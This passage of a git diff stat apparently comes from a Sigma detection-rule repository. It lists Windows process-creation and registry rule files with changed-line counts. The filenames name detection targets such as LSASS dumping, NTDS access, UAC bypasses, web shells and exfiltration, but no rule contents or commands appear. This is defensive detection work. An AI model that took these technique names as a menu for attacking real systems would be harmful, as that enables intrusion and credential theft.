...on_win_python_inline_command_execution.yml | 20 +- .../proc_creation_win_python_pty_spawn.yml | 10 +- .../proc_creation_win_query_session_exfil.yml | 5 +- .../proc_creation_win_rar_compress_data.yml | 7 +- ...tion_win_rar_compression_with_password.yml | 8 +- ...eation_win_rar_susp_greedy_compression.yml | 18 +- .../proc_creation_win_rasdial_execution.yml | 3 +- ...eation_win_rdrleakdiag_process_dumping.yml | 23 +- .../proc_creation_win_reg_add_run_key.yml | 8 +- .../proc_creation_win_reg_add_safeboot.yml | 16 +- .../proc_creation_win_reg_bitlocker.yml | 7 +- ..._credential_access_via_password_filter.yml | 5 +- ...oc_creation_win_reg_defender_exclusion.yml | 8 +- .../proc_creation_win_reg_delete_safeboot.yml | 14 +- .../proc_creation_win_reg_delete_services.yml | 12 +- ...tion_win_reg_desktop_background_change.yml | 39 +- ...direct_asep_registry_keys_modification.yml | 12 +- ..._creation_win_reg_disable_sec_services.yml | 9 +- ...eation_win_reg_dumping_sensitive_hives.yml | 46 +- ...numeration_for_credentials_in_registry.yml | 30 +- ...n_win_reg_import_from_suspicious_paths.yml | 15 +- ...n_win_reg_lsa_disable_restricted_admin.yml | 20 +- ...on_win_reg_lsa_ppl_protection_disabled.yml | 11 +- .../proc_creation_win_reg_machineguid.yml | 2 +- ...n_win_reg_modify_group_policy_settings.yml | 15 +- .../proc_creation_win_reg_nolmhash.yml | 16 +- .../proc_creation_win_reg_open_command.yml | 9 +- .../proc_creation_win_reg_query_registry.yml | 14 +- .../proc_creation_win_reg_rdp_keys_tamper.yml | 14 +- .../proc_creation_win_reg_screensaver.yml | 28 +- ...ation_win_reg_service_imagepath_change.yml | 16 +- ...oc_creation_win_reg_software_discovery.yml | 14 +- .../proc_creation_win_reg_susp_paths.yml | 10 +- .../proc_creation_win_reg_volsnap_disable.yml | 2 +- ...eation_win_reg_windows_defender_tamper.yml | 21 +- ...reg_write_protect_for_storage_disabled.yml | 8 +- ...m_regsvcs_uncommon_extension_execution.yml | 22 +- ...sm_regsvcs_uncommon_location_execution.yml | 24 +- ...ation_win_regedit_export_critical_keys.yml | 14 +- .../proc_creation_win_regedit_export_keys.yml | 16 +- .../proc_creation_win_regedit_import_keys.yml | 14 +- ...c_creation_win_regedit_import_keys_ads.yml | 14 +- .../proc_creation_win_regini_ads.yml | 13 +- .../proc_creation_win_regini_execution.yml | 13 +- ...tion_win_registry_cimprovider_dll_load.yml | 2 +- ...gistry_enumeration_for_credentials_cli.yml | 9 +- ...urity_zone_protocol_defaults_downgrade.yml | 14 +- ...registry_install_reg_debugger_backdoor.yml | 7 +- ...roc_creation_win_registry_logon_script.yml | 12 +- ...tion_win_registry_new_network_provider.yml | 15 +- ...y_privilege_escalation_via_service_key.yml | 7 +- ...gistry_provlaunch_provisioning_command.yml | 17 +- ...egistry_set_unsecure_powershell_policy.yml | 19 +- ...n_win_registry_typed_paths_persistence.yml | 5 +- ...oc_creation_win_regsvr32_flags_anomaly.yml | 7 +- ..._creation_win_regsvr32_http_ip_pattern.yml | 9 +- ..._creation_win_regsvr32_network_pattern.yml | 15 +- ...roc_creation_win_regsvr32_remote_share.yml | 7 +- ...eation_win_regsvr32_susp_child_process.yml | 6 +- ...creation_win_regsvr32_susp_exec_path_1.yml | 16 +- ...creation_win_regsvr32_susp_exec_path_2.yml | 27 +- ..._creation_win_regsvr32_susp_extensions.yml | 15 +- ...proc_creation_win_regsvr32_susp_parent.yml | 14 +- ...eation_win_regsvr32_uncommon_extension.yml | 26 +- ...win_remote_access_software_ultraviewer.yml | 22 +- ...eation_win_remote_access_tools_anydesk.yml | 28 +- ...s_tools_anydesk_piped_password_via_cli.yml | 6 +- ...te_access_tools_anydesk_silent_install.yml | 7 +- ..._remote_access_tools_anydesk_susp_exec.yml | 28 +- ...ion_win_remote_access_tools_gotoopener.yml | 22 +- ...eation_win_remote_access_tools_logmein.yml | 22 +- ...ion_win_remote_access_tools_netsupport.yml | 24 +- ...mote_access_tools_netsupport_susp_exec.yml | 13 +- ...ccess_tools_rurat_non_default_location.yml | 11 +- ..._win_remote_access_tools_screenconnect.yml | 22 +- ...mote_access_tools_screenconnect_access.yml | 5 +- ...ote_access_tools_screenconnect_anomaly.yml | 3 +- ...access_tools_screenconnect_remote_exec.yml | 11 +- ...roc_creation_win_remote_time_discovery.yml | 11 +- .../proc_creation_win_renamed_adfind.yml | 18 +- .../proc_creation_win_renamed_autohotkey.yml | 39 +- .../proc_creation_win_renamed_autoit.yml | 31 +- .../proc_creation_win_renamed_binary.yml | 13 +- ...ion_win_renamed_binary_highly_relevant.yml | 75 +- .../proc_creation_win_renamed_browsercore.yml | 3 +- .../proc_creation_win_renamed_cloudflared.yml | 10 +- .../proc_creation_win_renamed_createdump.yml | 23 +- .../proc_creation_win_renamed_curl.yml | 7 +- .../proc_creation_win_renamed_dctask64.yml | 3 +- .../proc_creation_win_renamed_ftp.yml | 3 +- .../proc_creation_win_renamed_gpg4win.yml | 3 +- .../proc_creation_win_renamed_jusched.yml | 3 +- .../proc_creation_win_renamed_mavinject.yml | 5 +- .../proc_creation_win_renamed_megasync.yml | 3 +- ...oc_creation_win_renamed_netsupport_rat.yml | 11 +- ..._creation_win_renamed_office_processes.yml | 36 +- .../proc_creation_win_renamed_paexec.yml | 40 +- .../proc_creation_win_renamed_pingcastle.yml | 59 +- .../proc_creation_win_renamed_plink.yml | 10 +- .../proc_creation_win_renamed_pressanykey.yml | 7 +- ...win_renamed_rundll32_dllregisterserver.yml | 10 +- .../proc_creation_win_renamed_rurat.yml | 3 +- ...tion_win_renamed_sysinternals_procdump.yml | 14 +- ...in_renamed_sysinternals_psexec_service.yml | 3 +- ...ation_win_renamed_sysinternals_sdelete.yml | 3 +- .../proc_creation_win_renamed_vmnat.yml | 3 +- .../proc_creation_win_renamed_whoami.yml | 3 +- ...reation_win_rpcping_credential_capture.yml | 29 +- ...tion_win_ruby_inline_command_execution.yml | 9 +- ..._win_rundll32_ads_stored_dll_execution.yml | 12 +- ...ndll32_advpack_obfuscated_ordinal_call.yml | 19 +- .../proc_creation_win_rundll32_by_ordinal.yml | 17 +- .../proc_creation_win_rundll32_inline_vbs.yml | 5 +- ...eation_win_rundll32_installscreensaver.yml | 9 +- ...ion_win_rundll32_js_runhtmlapplication.yml | 7 +- .../proc_creation_win_rundll32_keymgr.yml | 9 +- ...win_rundll32_mshtml_runhtmlapplication.yml | 10 +- .../proc_creation_win_rundll32_no_params.yml | 5 +- .../proc_creation_win_rundll32_ntlmrelay.yml | 11 +- ...n_win_rundll32_obfuscated_ordinal_call.yml | 8 +- ..._creation_win_rundll32_parent_explorer.yml | 12 +- ..._win_rundll32_process_dump_via_comsvcs.yml | 23 +- ...on_win_rundll32_registered_com_objects.yml | 8 +- ...oc_creation_win_rundll32_run_locations.yml | 27 +- .../proc_creation_win_rundll32_script_run.yml | 9 +- ...n_rundll32_setupapi_installhinfsection.yml | 10 +- ...on_win_rundll32_shell32_susp_execution.yml | 8 +- ...rundll32_shelldispatch_potential_abuse.yml | 9 +- ...c_creation_win_rundll32_spawn_explorer.yml | 3 +- ...oc_creation_win_rundll32_susp_activity.yml | 162 +- ...ion_win_rundll32_susp_control_dll_load.yml | 9 +- ...32_susp_execution_with_image_extension.yml | 13 +- ..._win_rundll32_susp_shellexec_execution.yml | 12 +- ...tion_win_rundll32_susp_shimcache_flush.yml | 11 +- .../proc_creation_win_rundll32_sys.yml | 7 +- .../proc_creation_win_rundll32_unc_path.yml | 11 +- ...on_win_rundll32_uncommon_dll_extension.yml | 17 +- .../proc_creation_win_rundll32_user32_dll.yml | 14 +- ...n_win_rundll32_webdav_client_execution.yml | 16 +- ..._rundll32_webdav_client_susp_execution.yml | 24 +- ...eation_win_rundll32_without_parameters.yml | 5 +- .../proc_creation_win_runonce_execution.yml | 11 +- ..._change_sevice_image_path_by_non_admin.yml | 7 +- .../proc_creation_win_sc_create_service.yml | 6 +- .../proc_creation_win_sc_disable_service.yml | 11 +- ...proc_creation_win_sc_new_kernel_driver.yml | 4 +- .../proc_creation_win_sc_query.yml | 11 +- ...ion_win_sc_sdset_allow_service_changes.yml | 28 +- ...ation_win_sc_sdset_deny_service_access.yml | 31 +- ...roc_creation_win_sc_sdset_hide_sevices.yml | 23 +- ...roc_creation_win_sc_sdset_modification.yml | 17 +- ...ation_win_sc_service_path_modification.yml | 9 +- ..._win_sc_service_tamper_for_persistence.yml | 38 +- .../proc_creation_win_sc_stop_service.yml | 21 +- ...tion_win_schtasks_appdata_local_system.yml | 11 +- .../proc_creation_win_schtasks_change.yml | 21 +- .../proc_creation_win_schtasks_creation.yml | 4 +- ...tion_win_schtasks_creation_temp_folder.yml | 5 +- .../proc_creation_win_schtasks_delete.yml | 16 +- .../proc_creation_win_schtasks_delete_all.yml | 6 +- .../proc_creation_win_schtasks_disable.yml | 12 +- .../proc_creation_win_schtasks_env_folder.yml | 40 +- ...oc_creation_win_schtasks_folder_combos.yml | 13 +- ...c_creation_win_schtasks_guid_task_name.yml | 10 +- ...n_schtasks_one_time_only_midnight_task.yml | 11 +- .../proc_creation_win_schtasks_parent.yml | 10 +- ...schtasks_persistence_windows_telemetry.yml | 20 +- ...on_win_schtasks_powershell_persistence.yml | 11 +- .../proc_creation_win_schtasks_reg_loader.yml | 22 +- ...eation_win_schtasks_reg_loader_encoded.yml | 21 +- ...oc_creation_win_schtasks_schedule_type.yml | 19 +- ...tion_win_schtasks_schedule_type_system.yml | 22 +- ...asks_schedule_via_masqueraded_xml_file.yml | 18 +- ...roc_creation_win_schtasks_susp_pattern.yml | 23 +- .../proc_creation_win_schtasks_system.yml | 22 +- ..._creation_win_sdbinst_shim_persistence.yml | 22 +- ...oc_creation_win_sdbinst_susp_extension.yml | 37 +- .../proc_creation_win_sdclt_child_process.yml | 3 +- ...roc_creation_win_sdiagnhost_susp_child.yml | 7 +- .../proc_creation_win_secedit_execution.yml | 13 +- ..._creation_win_servu_susp_child_process.yml | 8 +- ...oc_creation_win_setspn_spn_enumeration.yml | 12 +- .../proc_creation_win_shutdown_execution.yml | 2 +- .../proc_creation_win_shutdown_logoff.yml | 2 +- ...eation_win_sndvol_susp_child_processes.yml | 5 +- ...eation_win_soundrecorder_audio_capture.yml | 2 +- ...proc_creation_win_splwow64_cli_anomaly.yml | 2 +- ...ation_win_spoolsv_susp_child_processes.yml | 19 +- ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 7 +- .../proc_creation_win_sqlcmd_veeam_dump.yml | 2 +- ...ation_win_sqlite_chromium_profile_data.yml | 25 +- ..._win_sqlite_firefox_gecko_profile_data.yml | 15 +- .../proc_creation_win_squirrel_download.yml | 25 +- ..._creation_win_squirrel_proxy_execution.yml | 37 +- .../proc_creation_win_ssh_port_forward.yml | 2 +- .../proc_creation_win_ssh_rdp_tunneling.yml | 9 +- .../proc_creation_win_ssm_agent_abuse.yml | 5 +- ...eation_win_stordiag_susp_child_process.yml | 5 +- ...oc_creation_win_susp_16bit_application.yml | 4 +- ...ation_win_susp_abusing_debug_privilege.yml | 20 +- ...on_win_susp_add_user_local_admin_group.yml | 25 +- ...win_susp_add_user_remote_desktop_group.yml | 25 +- ...eation_win_susp_alternate_data_streams.yml | 15 +- ...ays_install_elevated_windows_installer.yml | 12 +- .../proc_creation_win_susp_appx_execution.yml | 13 +- ...ary_shell_execution_via_settingcontent.yml | 8 +- ...reation_win_susp_archiver_iso_phishing.yml | 8 +- ...creation_win_susp_automated_collection.yml | 9 +- ...n_susp_bad_opsec_sacrificial_processes.yml | 37 +- ...tion_win_susp_child_process_as_system_.yml | 16 +- ...n_win_susp_cli_obfuscation_escape_char.yml | 7 +- ...ation_win_susp_cli_obfuscation_unicode.yml | 54 +- ...usp_commandline_path_traversal_evasion.yml | 11 +- ...oc_creation_win_susp_copy_browser_data.yml | 50 +- ...reation_win_susp_copy_lateral_movement.yml | 43 +- ...proc_creation_win_susp_copy_system_dir.yml | 41 +- ...eation_win_susp_copy_system_dir_lolbin.yml | 32 +- ...creation_win_susp_crypto_mining_monero.yml | 6 +- ...ion_win_susp_data_exfiltration_via_cli.yml | 57 +- ...proc_creation_win_susp_disable_raccine.yml | 9 +- ...roc_creation_win_susp_double_extension.yml | 13 +- ...ation_win_susp_double_extension_parent.yml | 80 +- ...eation_win_susp_download_office_domain.yml | 30 +- ...reation_win_susp_dumpstack_log_evasion.yml | 2 +- ...on_win_susp_elavated_msi_spawned_shell.yml | 16 +- ...reation_win_susp_electron_app_children.yml | 33 +- ...tion_win_susp_electron_exeuction_proxy.yml | 61 +- ..._elevated_system_shell_uncommon_parent.yml | 44 +- .../proc_creation_win_susp_embed_exe_lnk.yml | 5 +- ...tion_win_susp_etw_modification_cmdline.yml | 6 +- ...oc_creation_win_susp_etw_trace_evasion.yml | 23 +- .../proc_creation_win_susp_eventlog_clear.yml | 25 +- ...eation_win_susp_eventlog_content_recon.yml | 44 +- ..._susp_execution_from_guid_folder_names.yml | 21 +- ...execution_from_public_folder_as_parent.yml | 5 +- .../proc_creation_win_susp_execution_path.yml | 40 +- ...tion_win_susp_execution_path_webserver.yml | 3 +- ...creation_win_susp_file_characteristics.yml | 6 +- ...win_susp_gather_network_info_execution.yml | 13 +- ...n_win_susp_hidden_dir_index_allocation.yml | 14 +- ...in_susp_hiding_malware_in_fonts_folder.yml | 10 +- ...win_susp_homoglyph_cyrillic_lookalikes.yml | 118 +- .../proc_creation_win_susp_image_missing.yml | 24 +- ...ation_win_susp_inline_base64_mz_header.yml | 4 +- ...reation_win_susp_inline_win_api_access.yml | 13 +- ...p_local_system_owner_account_discovery.yml | 33 +- ..._win_susp_lolbin_exec_from_non_c_drive.yml | 53 +- ...eation_win_susp_lsass_dmp_cli_keywords.yml | 52 +- ...tion_win_susp_ms_appinstaller_download.yml | 13 +- ...proc_creation_win_susp_network_command.yml | 5 +- ...oc_creation_win_susp_network_scan_loop.yml | 8 +- ...roc_creation_win_susp_network_sniffing.yml | 17 +- .../proc_creation_win_susp_non_exe_image.yml | 24 +- ...c_creation_win_susp_non_priv_reg_or_ps.yml | 11 +- .../proc_creation_win_susp_ntds.yml | 57 +- ...creation_win_susp_nteventlogfile_usage.yml | 11 +- ..._win_susp_ntfs_short_name_path_use_cli.yml | 42 +- ...in_susp_ntfs_short_name_path_use_image.yml | 40 +- ...ation_win_susp_ntfs_short_name_use_cli.yml | 20 +- ...ion_win_susp_ntfs_short_name_use_image.yml | 10 +- ...eation_win_susp_obfuscated_ip_download.yml | 32 +- ...reation_win_susp_obfuscated_ip_via_cli.yml | 30 +- ..._creation_win_susp_office_token_search.yml | 10 +- .../proc_creation_win_susp_parents.yml | 15 +- ...in_susp_priv_escalation_via_named_pipe.yml | 21 +- ...c_creation_win_susp_private_keys_recon.yml | 32 +- ...susp_privilege_escalation_cli_patterns.yml | 9 +- ...oc_creation_win_susp_proc_wrong_parent.yml | 16 +- .../proc_creation_win_susp_progname.yml | 31 +- .../proc_creation_win_susp_recon.yml | 25 +- ...on_win_susp_recycle_bin_fake_execution.yml | 8 +- ...on_win_susp_redirect_local_admin_share.yml | 7 +- ...tion_win_susp_remote_desktop_tunneling.yml | 8 +- ...eation_win_susp_right_to_left_override.yml | 12 +- ...n_win_susp_script_exec_from_env_folder.yml | 25 +- ...reation_win_susp_script_exec_from_temp.yml | 8 +- ...roc_creation_win_susp_service_creation.yml | 15 +- .../proc_creation_win_susp_service_tamper.yml | 69 +- ...eation_win_susp_shadow_copies_creation.yml | 25 +- ...eation_win_susp_shadow_copies_deletion.yml | 53 +- ...tion_win_susp_shell_spawn_susp_program.yml | 11 +- .../proc_creation_win_susp_sysnative.yml | 7 +- ...c_creation_win_susp_system_exe_anomaly.yml | 23 +- ..._creation_win_susp_system_user_anomaly.yml | 104 +- .../proc_creation_win_susp_sysvol_access.yml | 2 +- ..._creation_win_susp_task_folder_evasion.yml | 17 +- .../proc_creation_win_susp_use_of_te_bin.yml | 17 +- ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 13 +- .../proc_creation_win_susp_userinit_child.yml | 6 +- ...tion_win_susp_weak_or_abused_passwords.yml | 9 +- ...n_win_susp_web_request_cmd_and_cmdlets.yml | 20 +- ...proc_creation_win_susp_whoami_as_param.yml | 5 +- ...in_svchost_execution_with_no_cli_flags.yml | 14 +- ...eation_win_svchost_termserv_proc_spawn.yml | 5 +- ...on_win_svchost_uncommon_parent_process.yml | 2 +- ...sinternals_accesschk_check_permissions.yml | 21 +- ..._win_sysinternals_adexplorer_execution.yml | 13 +- ...sysinternals_adexplorer_susp_execution.yml | 17 +- ...reation_win_sysinternals_eula_accepted.yml | 9 +- ...tion_win_sysinternals_livekd_execution.yml | 8 +- ...sysinternals_livekd_kernel_memory_dump.yml | 13 +- ...tion_win_sysinternals_procdump_evasion.yml | 18 +- ...eation_win_sysinternals_procdump_lsass.yml | 14 +- ...tion_win_sysinternals_psexec_execution.yml | 4 +- ...nternals_psexec_paexec_escalate_system.yml | 25 +- ...n_sysinternals_psexec_remote_execution.yml | 6 +- ...roc_creation_win_sysinternals_psexesvc.yml | 11 +- ...on_win_sysinternals_psexesvc_as_system.yml | 14 +- ...oc_creation_win_sysinternals_psloglist.yml | 19 +- ...oc_creation_win_sysinternals_psservice.yml | 11 +- ...n_win_sysinternals_pssuspend_execution.yml | 15 +- ..._sysinternals_pssuspend_susp_execution.yml | 18 +- ...proc_creation_win_sysinternals_sdelete.yml | 2 +- ..._sysinternals_susp_psexec_paexec_flags.yml | 22 +- ..._win_sysinternals_sysmon_config_update.yml | 14 +- ...tion_win_sysinternals_sysmon_uninstall.yml | 16 +- ...on_win_sysinternals_tools_masquerading.yml | 5 +- .../proc_creation_win_sysprep_appdata.yml | 8 +- ...proc_creation_win_systeminfo_execution.yml | 4 +- ...ettingsadminflows_turn_on_dev_features.yml | 15 +- ...roc_creation_win_takeown_recursive_own.yml | 5 +- ...proc_creation_win_tapinstall_execution.yml | 3 +- .../proc_creation_win_tar_compression.yml | 12 +- .../proc_creation_win_tar_extraction.yml | 12 +- .../proc_creation_win_taskkill_sep.yml | 17 +- ..._creation_win_tasklist_basic_execution.yml | 10 +- .../proc_creation_win_taskmgr_localsystem.yml | 2 +- ...ms_suspicious_command_line_cred_access.yml | 12 +- ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 2 +- .../proc_creation_win_tscon_localsystem.yml | 2 +- .../proc_creation_win_tscon_rdp_redirect.yml | 2 +- ...eation_win_tscon_rdp_session_hijacking.yml | 4 +- .../proc_creation_win_uac_bypass_cleanmgr.yml | 5 +- .../proc_creation_win_uac_bypass_cmstp.yml | 9 +- ...win_uac_bypass_cmstp_com_object_access.yml | 13 +- ...eation_win_uac_bypass_computerdefaults.yml | 3 +- ...eation_win_uac_bypass_consent_comctl32.yml | 3 +- .../proc_creation_win_uac_bypass_dismhost.yml | 3 +- ...on_win_uac_bypass_eventvwr_recentviews.yml | 9 +- ...proc_creation_win_uac_bypass_fodhelper.yml | 3 +- ...n_uac_bypass_hijacking_firwall_snap_in.yml | 3 +- ...roc_creation_win_uac_bypass_icmluautil.yml | 4 +- ...c_creation_win_uac_bypass_msconfig_gui.yml | 2 +- ...tion_win_uac_bypass_ntfs_reparse_point.yml | 12 +- ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 3 +- .../proc_creation_win_uac_bypass_sdclt.yml | 3 +- .../proc_creation_win_uac_bypass_winsat.yml | 3 +- .../proc_creation_win_uac_bypass_wmp.yml | 6 +- .../proc_creation_win_uac_bypass_wsreset.yml | 14 +- .../proc_creation_win_ultravnc.yml | 12 +- ...c_creation_win_ultravnc_susp_execution.yml | 6 +- ...ation_win_uninstall_crowdstrike_falcon.yml | 8 +- ..._win_userinit_uncommon_child_processes.yml | 30 +- .../proc_creation_win_vaultcmd_list_creds.yml | 9 +- .../proc_creation_win_verclsid_runs_com.yml | 6 +- ...proc_creation_win_virtualbox_execution.yml | 11 +- ...n_win_virtualbox_vboxdrvinst_execution.yml | 15 +- ...ion_win_vmware_toolbox_cmd_persistence.yml | 13 +- ...in_vmware_toolbox_cmd_persistence_susp.yml | 16 +- ...win_vmware_vmtoolsd_susp_child_process.yml | 45 +- ...n_win_vscode_child_processes_anomalies.yml | 11 +- ...c_creation_win_vscode_tunnel_execution.yml | 11 +- ...eation_win_vscode_tunnel_remote_shell_.yml | 9 +- ...on_win_vscode_tunnel_renamed_execution.yml | 16 +- ...tion_win_vscode_tunnel_service_install.yml | 2 +- ...tion_win_vsdiagnostics_execution_proxy.yml | 11 +- ..._win_vslsagent_agentextensionpath_load.yml | 7 +- .../proc_creation_win_w32tm.yml | 9 +- ...ab_execution_from_non_default_location.yml | 3 +- .../proc_creation_win_wab_unusual_parents.yml | 10 +- ...n_win_wbadmin_delete_systemstatebackup.yml | 13 +- ...proc_creation_win_webdav_lnk_execution.yml | 6 +- .../proc_creation_win_webshell_chopper.yml | 9 +- .../proc_creation_win_webshell_hacking.yml | 53 +- ..._webshell_recon_commands_and_processes.yml | 87 +- ...ll_susp_process_spawned_from_webserver.yml | 19 +- .../proc_creation_win_webshell_tool_recon.yml | 11 +- ...reation_win_werfault_lsass_shtinkering.yml | 18 +- ...ion_win_werfault_reflect_debugger_exec.yml | 14 +- ...creation_win_wermgr_susp_child_process.yml | 7 +- ...creation_win_wermgr_susp_exec_location.yml | 7 +- ...c_creation_win_wget_download_direct_ip.yml | 17 +- ...get_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_where_browser_data_recon.yml | 22 +- ...proc_creation_win_whoami_all_execution.yml | 6 +- .../proc_creation_win_whoami_execution.yml | 7 +- ...hoami_execution_from_high_priv_process.yml | 11 +- ...c_creation_win_whoami_groups_discovery.yml | 10 +- .../proc_creation_win_whoami_output.yml | 12 +- ...roc_creation_win_whoami_parent_anomaly.yml | 10 +- ...roc_creation_win_whoami_priv_discovery.yml | 10 +- ...ion_win_windows_terminal_susp_children.yml | 58 +- ..._creation_win_winget_add_custom_source.yml | 14 +- ..._win_winget_add_insecure_custom_source.yml | 23 +- ...tion_win_winget_add_susp_custom_source.yml | 17 +- ..._win_winget_local_install_via_manifest.yml | 24 +- ...oc_creation_win_winrar_exfil_dmp_files.yml | 20 +- ...creation_win_winrar_susp_child_process.yml | 41 +- ...n_win_winrar_uncommon_folder_execution.yml | 16 +- .../proc_creation_win_winrm_awl_bypass.yml | 10 +- ..._execution_via_scripting_api_winrm_vbs.yml | 10 +- ...inrm_remote_powershell_session_process.yml | 8 +- ..._creation_win_winrm_susp_child_process.yml | 3 +- ...eation_win_winzip_password_compression.yml | 9 +- ..._wmi_backdoor_exchange_transport_agent.yml | 2 +- ..._wmi_persistence_script_event_consumer.yml | 4 +- ...eation_win_wmic_eventconsumer_creation.yml | 5 +- ...c_creation_win_wmic_namespace_defender.yml | 9 +- ...roc_creation_win_wmic_process_creation.yml | 13 +- ...creation_win_wmic_recon_computersystem.yml | 9 +- ...proc_creation_win_wmic_recon_csproduct.yml | 9 +- .../proc_creation_win_wmic_recon_group.yml | 20 +- .../proc_creation_win_wmic_recon_hotfix.yml | 10 +- .../proc_creation_win_wmic_recon_process.yml | 13 +- .../proc_creation_win_wmic_recon_product.yml | 9 +- ..._creation_win_wmic_recon_product_class.yml | 9 +- .../proc_creation_win_wmic_recon_service.yml | 28 +- ...on_win_wmic_recon_system_info_uncommon.yml | 24 +- ...win_wmic_recon_unquoted_service_search.yml | 17 +- ...roc_creation_win_wmic_remote_execution.yml | 16 +- ...creation_win_wmic_service_manipulation.yml | 8 +- ...oc_creation_win_wmic_squiblytwo_bypass.yml | 27 +- ...wmic_susp_execution_via_office_process.yml | 32 +- ...reation_win_wmic_susp_process_creation.yml | 12 +- ...reation_win_wmic_terminate_application.yml | 13 +- ...reation_win_wmic_uninstall_application.yml | 10 +- ...n_win_wmic_uninstall_security_products.yml | 17 +- ...reation_win_wmic_xsl_script_processing.yml | 25 +- ...creation_win_wmiprvse_spawning_process.yml | 18 +- ...reation_win_wmiprvse_spawns_powershell.yml | 23 +- ...tion_win_wmiprvse_susp_child_processes.yml | 23 +- ...ation_win_wpbbin_potential_persistence.yml | 6 +- ...eation_win_wscript_cscript_script_exec.yml | 24 +- ...n_wscript_cscript_susp_child_processes.yml | 25 +- ...script_cscript_uncommon_extension_exec.yml | 19 +- ...tion_win_wsl_child_processes_anomalies.yml | 9 +- ...proc_creation_win_wsl_lolbin_execution.yml | 28 +- ...ion_win_wsl_windows_binaries_execution.yml | 5 +- .../proc_creation_win_wuauclt_dll_loading.yml | 30 +- ...ion_win_wuauclt_no_cli_flags_execution.yml | 12 +- ...creation_win_wusa_cab_files_extraction.yml | 9 +- ...a_cab_files_extraction_from_susp_paths.yml | 9 +- ...reation_win_wusa_susp_parent_execution.yml | 30 +- .../proc_tampering_susp_process_hollowing.yml | 6 +- ..._susp_disk_access_using_uncommon_tools.yml | 6 +- .../registry_add_malware_netwire.yml | 3 +- .../registry_add_malware_ursnif.yml | 2 +- ...egistry_add_persistence_amsi_providers.yml | 8 +- ...gistry_add_persistence_com_key_linking.yml | 4 +- ...persistence_disk_cleanup_handler_entry.yml | 20 +- ...e_logon_scripts_userinitmprlogonscript.yml | 8 +- ...dd_pua_sysinternals_execution_via_eula.yml | 5 +- ...ysinternals_renamed_execution_via_eula.yml | 16 +- ...a_sysinternals_susp_execution_via_eula.yml | 19 +- ...delete_exploit_guard_protected_folders.yml | 9 +- .../registry_delete_mstsc_history_cleared.yml | 7 +- ...istry_delete_removal_amsi_registry_key.yml | 9 +- ...ete_removal_com_hijacking_registry_key.yml | 20 +- ...asks_hide_task_via_index_value_removal.yml | 14 +- ...chtasks_hide_task_via_sd_value_removal.yml | 9 +- ...registry_event_apt_oceanlotus_registry.yml | 3 + .../registry_event_apt_oilrig_mar18.yml | 18 +- .../registry_event_bypass_via_wsreset.yml | 4 +- ...stry_event_cmstp_execution_by_registry.yml | 3 +- ...y_events_logging_adding_reg_key_minint.yml | 11 +- ...event_disable_wdigest_credential_guard.yml | 11 +- ...entutl_volume_shadow_copy_service_keys.yml | 6 +- ...t_hybridconnectionmgr_svc_installation.yml | 5 +- .../registry_event_mal_flowcloud.yml | 10 +- ...registry_event_malware_qakbot_registry.yml | 3 +- ...gistry_event_mimikatz_printernightmare.yml | 9 +- ...y_event_modify_screensaver_binary_path.yml | 5 +- ...ry_event_narrator_feedback_persistance.yml | 3 +- ..._dll_added_to_appcertdlls_registry_key.yml | 16 +- ...dll_added_to_appinit_dlls_registry_key.yml | 17 +- .../registry_event_office_test_regadd.yml | 3 +- ...event_office_trust_record_modification.yml | 7 +- ...registry_event_persistence_recycle_bin.yml | 4 +- .../registry_event_portproxy_registry_key.yml | 3 +- .../registry_event_runkey_winekey.yml | 6 +- .../registry_event_runonce_persistence.yml | 9 +- ...try_event_shell_open_keys_manipulation.yml | 11 +- ...registry_event_silentprocessexit_lsass.yml | 7 +- .../registry_event_ssp_added_lsa_config.yml | 3 +- ...registry_event_stickykey_like_backdoor.yml | 4 +- .../registry_event_susp_atbroker_change.yml | 3 +- .../registry_event_susp_download_run_key.yml | 3 +- .../registry_event_susp_lsass_dll_load.yml | 3 +- .../registry_event_susp_mic_cam_access.yml | 6 +- ...gistry_set_enable_anonymous_connection.yml | 3 +- ...stry_set_add_load_service_in_safe_mode.yml | 3 +- .../registry_set_add_port_monitor.yml | 15 +- .../registry_set_aedebug_persistence.yml | 7 +- ...et_allow_rdp_remote_assistance_feature.yml | 3 +- .../registry_set_amsi_com_hijack.yml | 6 +- ...set_asep_reg_keys_modification_classes.yml | 13 +- ..._set_asep_reg_keys_modification_common.yml | 32 +- ...eg_keys_modification_currentcontrolset.yml | 14 +- ...p_reg_keys_modification_currentversion.yml | 55 +- ...eg_keys_modification_currentversion_nt.yml | 34 +- ...eg_keys_modification_internet_explorer.yml | 12 +- ..._set_asep_reg_keys_modification_office.yml | 16 +- ..._reg_keys_modification_session_manager.yml | 15 +- ...p_reg_keys_modification_system_scripts.yml | 12 +- ...et_asep_reg_keys_modification_winsock2.yml | 21 +- ...asep_reg_keys_modification_wow6432node.yml | 32 +- ..._keys_modification_wow6432node_classes.yml | 12 +- ...odification_wow6432node_currentversion.yml | 18 +- .../registry_set_bginfo_custom_db.yml | 6 +- .../registry_set_bginfo_custom_vbscript.yml | 11 +- .../registry_set_bginfo_custom_wmi_query.yml | 11 +- .../registry_set_blackbyte_ransomware.yml | 3 +- ...istry_set_bypass_uac_using_eventviewer.yml | 3 +- ...et_bypass_uac_using_silentcleanup_task.yml | 4 +- .../registry_set_change_rdp_port.yml | 13 +- .../registry_set_change_security_zones.yml | 11 +- ...stry_set_change_sysmon_driver_altitude.yml | 4 +- ...gistry_set_change_winevt_channelaccess.yml | 10 +- .../registry_set_chrome_extension.yml | 212 +- .../registry_set_clickonce_trust_prompt.yml | 3 +- ...stry_set_cobaltstrike_service_installs.yml | 12 +- ...istry_set_creation_service_susp_folder.yml | 16 +- ...y_set_creation_service_uncommon_folder.yml | 22 +- ...try_set_cve_2020_1048_new_printer_port.yml | 3 +- ...gistry_set_cve_2022_30190_msdt_follina.yml | 3 +- ...try_set_dbgmanageddebugger_persistence.yml | 10 +- .../registry_set_defender_exclusions.yml | 4 +- ...registry_set_desktop_background_change.yml | 25 +- ...pervisorenforcedcodeintegrity_disabled.yml | 7 +- .../registry_set_dhcp_calloutdll.yml | 4 +- ...istry_set_disable_administrative_share.yml | 4 +- ...gistry_set_disable_autologger_sessions.yml | 5 +- ...registry_set_disable_defender_firewall.yml | 6 +- .../registry_set_disable_function_user.yml | 3 +- ...stry_set_disable_macroruntimescanscope.yml | 3 +- ..._disable_security_center_notifications.yml | 3 +- .../registry_set_disable_system_restore.yml | 3 +- 